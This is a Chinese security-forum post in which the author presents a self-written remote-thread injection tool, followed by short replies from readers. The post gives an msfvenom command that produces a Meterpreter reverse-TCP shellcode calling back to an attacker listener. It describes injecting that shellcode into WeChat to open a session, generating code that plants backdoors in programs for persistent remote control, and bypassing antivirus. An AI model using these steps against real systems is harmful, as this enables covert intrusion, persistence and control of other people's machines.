远程线程注入工具 - 可自定义shellcode 可生成注入代码

Yaoヽ药药   ·   发表于 2020-11-10 18:43:03   ·   安全工具

文章转载自《通过听觉入侵你》,由本人原创

本次给大家带来一款本人写的小工具

可自定义shellcode注入任意进程,并且可生产对应的代码给自己的代码调用

这里第二个输入框,可以直接输入msf生成的payload

就会自动转换成易语言可调用的机器码,可以用此来直接注入指定的进程

  1. msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.93.131 lport=6666 -f c

直接将生成的shellcode复制进工具里面 转换结束后便可以进行注入了

在这里选择需要注入的进程

这里我选择微信,并且点击注入 这边msf便成功上线了

双击下面的输入框便会生成线程注入的代码 给自己的代码调用

当然了也可以生成利用自身程序给msf反弹shell的代码

选择最下角的选项 再双击输入框即可

将生成的代码复制进易语言,然后调用对应的函数 便可以实现线程注入了

可以使用此方法在自己的程序中放后门 进行一个持久化的控制 当然了需要一个公网服务器来接收反弹

直接调用 生成的函数 程序界面会卡住
可以另开一个线程来执行这段代码
启动线程(&调用此函数)

当然了这里也不仅仅是只可以注入个msf的payload
这里也可以自己提取shellcode 然后进行注入 生成

在第一个输入框输入自己提取的shellcode,注意是10进制的,使用半角符的逗号进行区分

这里是手动提取shellcode然后进行注入的截图

这里是我自己写的一个小程序,现在通过易语言的万能特征码 ff 55 fc 5f 5e寻找到了对应的代码区域,现在再进行提取机器码

对提取出来的asm汇编指令进行转换

然后再进行注入,可以看到成功拿到flag 并且再不修改程序代码的情况下 利用了本程序在目标进程执行任意代码!

利用生成的代码 如果编译后绕过杀毒软件 可以看一下 下面提供的视频
生成的payload请配合精易模块使用

视频以及工具下载地址

用户名金币积分时间理由
Track-手电筒 0.00 0 2020-12-08 15:03:26 一个受益终生的帖子~~
Track-手电筒 5.00 0 2020-12-08 15:03:23 一个受益终生的帖子~~
Track-手电筒 10.00 0 2020-12-08 15:03:59 一个受益终生的帖子~~
奖励系统 100.00 0 2020-11-19 09:09:51 投稿满 10 赞奖励
奖励系统 50.00 0 2020-11-11 13:01:41 投稿满 5 赞奖励

打赏我,让我更有动力~

18 条回复   |  直到 2022-3-14 | 1583 次浏览

tgs
发表于 2020-11-10

厉害了我的大佬

评论列表

  • 加载数据中...

编写评论内容

小手冰凉
发表于 2020-11-10

评论列表

  • 加载数据中...

编写评论内容

辣条姐
发表于 2020-11-10

来学习学习

评论列表

  • 加载数据中...

编写评论内容

Yaoヽ药药
发表于 2020-11-10

点赞啊 各位

评论列表

  • 加载数据中...

编写评论内容

柠檬
发表于 2020-11-11

666

评论列表

  • 加载数据中...

编写评论内容

奥展
发表于 2020-11-11

123

评论列表

  • 加载数据中...

编写评论内容

lxx欣
发表于 2020-11-18

学习学习

评论列表

  • 加载数据中...

编写评论内容

904815041
发表于 2020-11-18

1

评论列表

  • 加载数据中...

编写评论内容

tianmao
发表于 2020-11-19

666

评论列表

  • 加载数据中...

编写评论内容

TanSon
发表于 2020-11-23

1

评论列表

  • 加载数据中...

编写评论内容

noob3r
发表于 2020-11-23

1

评论列表

  • 加载数据中...

编写评论内容

善鑫未名
发表于 2020-12-12

来学习,赞

评论列表

  • 加载数据中...

编写评论内容

darren
发表于 2020-12-31

666

评论列表

  • 加载数据中...

编写评论内容

黑影
发表于 2021-1-5

11111111

评论列表

  • 加载数据中...

编写评论内容

1614895030
发表于 2021-1-21

66666

评论列表

  • 加载数据中...

编写评论内容

八两二号
发表于 2021-8-16

评论列表

  • 加载数据中...

编写评论内容

326516678
发表于 2021-9-6

不愧是阿药

评论列表

  • 加载数据中...

编写评论内容

君叹
发表于 2022-3-14

nb

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.